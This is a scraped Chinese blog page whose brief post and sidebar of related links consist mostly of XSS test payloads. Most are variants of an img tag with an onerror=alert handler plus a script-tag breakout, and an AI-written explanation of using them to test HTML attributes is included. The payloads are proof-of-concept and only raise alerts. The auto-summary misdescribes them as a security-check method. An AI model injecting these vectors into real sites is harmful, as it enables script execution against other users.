"><img src=hi onerror=alert(1)>

最新推荐文章于 2024-08-26 15:30:43 发布
原创 最新推荐文章于 2024-08-26 15:30:43 发布 · 537 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种利用图片src属性进行安全检查的方法。当指定路径的图片无法加载时,会触发一个警告对话框,显示数字1。这种方法可以用于简单的安全验证或者错误提示。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

"><img src=hi onerror=alert(1)>
正常情况:


现在的情况:




如果图片的src 所指的路径路径 不存在图片 则 弹出对话框 显示1

efregrh
关注
HTML+CSS+JS+jQuery学习笔记
weixin_48778425的博客
10-08 598
HTML 一、基本标签 标题标签:<h1>标题标签</h1> 注释标签:<!-- --> 换行标签:<br/> 段落标签: <p>段落标签</p> 分隔线标签:<hr/> 加粗标签: <strong>加粗</strong> or <b>加粗</b> 倾斜标签: 倾斜 or &lt
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3635
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
“><img src=x onerror=alert(1)
miniguaishou的博客
03-31 897
"> ">
<img src=1 onerror=alert(1)>
hyy044101331的专栏
08-19 1047
<>"'
"><img src=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>
05-30 3822
">
<img src=1 onerror=alert(1) />
llwwzz554的专栏
08-26 1903
123
【项目】Boost 搜索引擎
StackFrame
08-26 1629
Boost 搜索引擎
TP5.1框架中百度富文本编辑器UEditor的使用
Sol的博客
08-02 3174
在实际项目开发中最常使用到的工具之一就是富文本编辑器,使用富文本编辑器可以实现所见即所得的效果,且所有富文本编辑器里的内容(包括图片,视频,音乐等文件)全部可以带格式的存入数据库中且只需占用一个字段。当前市面上有许多可供选择的富文本编辑器,虽然百度的UEditor已在2016年即停止更新且界面风格较老,但是其属性,功能十分强大,所以仍是当前富文本编辑器里最好的选择之一。 现在就开始在ThinkPH...
渣渣枫初识Vue与Element
m0_51173023的博客
10-14 478
渣渣初学Uve与Element章目录前言一、Vue标题二、Element1.引入库2.读入数据案例总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Vue 标题 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、Element 1.引入库 代码如下(示例): import numpy
<img src=“x“ onerror=alert(1)“>
每天多一点干货
12-20 1233
read函数的数据传输过程是怎样的?公司是迈瑞医疗,岗位是自动化开发,学历是硕士985,地点是武汉,校招薪资是(22+0.5+0.616)*14,应该是这个岗位的顶峰了。985非科班硕,今天接到了保温电话,hr问期望薪资,因为我手上只有3个总包20w左右的国企offer,卑微地跟hr说期望薪资25w以上,达不到的话23w以上也行。985非科班硕,今天接到了保温电话,hr问期望薪资,因为我手上只有3个总包20w左右的国企offer,卑微地跟hr说期望薪资25w以上,达不到的话23w以上也行。
<img onpopstate=alErt(1) src=1 onerror=alert(1) />
llwwzz554的专栏
08-26 604
<img/src=x onerror=alert()>
qq_33442338的博客
01-23 1411
<img/src=x onerror=alert()>
"><img src=x onerror=alert(1)>
Root_Mosuan的专栏"}/></script><script>alert(/xss/)</s
12-30 2931
"><img src=x onerror=alert(1)>
"><img src="x" onerror="alert(1)"> —— 用来测试HTML属性中的XSS漏洞
最新发布
04-08
### 测试HTML属性中的XSS漏洞 通过 `img` 标签和 `onerror` 事件可以有效地测试 HTML 中是否存在 XSS(跨站脚本攻击)漏洞。以下是具体方法: #### 利用方式 当页面未对输入内容进行严格过滤时,可以通过构造恶意的 `img` 标签来触发 JavaScript 执行。例如,在某些情况下,即使标签闭合不完整或者图片加载失败,仍然可能触发 `onerror` 事件。 一种常见的测试向量如下所示: ```html <img src="x" onerror="alert('XSS')" /> ``` 上述代码片段会尝试加载一张不存在的图片 (`src="x"`),由于路径错误导致加载失败并触发表单内的 `onerror` 属性所定义的行为——即弹出提示框显示字符串 `'XSS'`[^2]。 如果目标网站允许用户提交数据,并且这些数据未经适当转义便嵌入到返回给其他用户的网页中,则此类型的payload可能会成功运行JavaScript代码于受害者的浏览器环境里。 另外还有一种更复杂的情况描述为:“...注入的标签就失去了他的闭合性了…但是onerror事件是专门针对js出错的…” 这种情形下不仅能够绕过简单的字符过滤机制而且还能造成持续性的DoS(拒绝服务)影响因为不断循环调用自身从而耗尽资源直至崩溃停止响应正常请求为止[^3]. 需要注意的是实际操作前应获得相应授权以免违反法律或道德准则. ```javascript var img = document.createElement('img'); img.width = 0; img.height = 0; img.src = 'http://nonexistent-url.com'; img.onerror = function() { alert('This is an example of XSS via the onerror event.'); }; document.body.appendChild(img); ``` 以上脚本动态创建了一个不可见图像元素, 并设置了其源地址指向一个肯定无法解析的位置 ("http://nonexistent-url.com"), 当发生错误时就会激活绑定好的处理函数进而展示警告对话框告知存在潜在的安全隐患[^1].
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值